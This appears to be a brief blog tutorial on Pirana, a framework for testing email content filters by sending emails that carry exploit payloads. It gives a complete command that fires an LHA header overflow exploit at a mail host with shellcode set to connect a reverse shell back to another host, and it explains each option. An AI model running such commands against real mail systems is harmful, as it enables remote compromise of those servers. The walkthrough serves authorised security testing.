Pirana is an exploitation framework that tests the security of a email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
Pirana with all it’s options:
We will try out some of the options in Pirana. First we have to compile the exploits.
Than we will will run this command: pirana.pl -e 1 -h linuxhaxor.net -a email@example.com -s 0 -l linuxhaxor.net – 80
Here -e stands for exploit, and of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”
-h stands for host name; -a stands for destination e-mail addie; -s for shellcode types there are 3 types available; finally -l stands for the host to connect back to in reverse shell mode.
We tried the command once with -v, to attach EICAR virus and once without the virus.
And the outcome:
There are many combinations of options to play with, but you get an idea of it once you start playing around with it.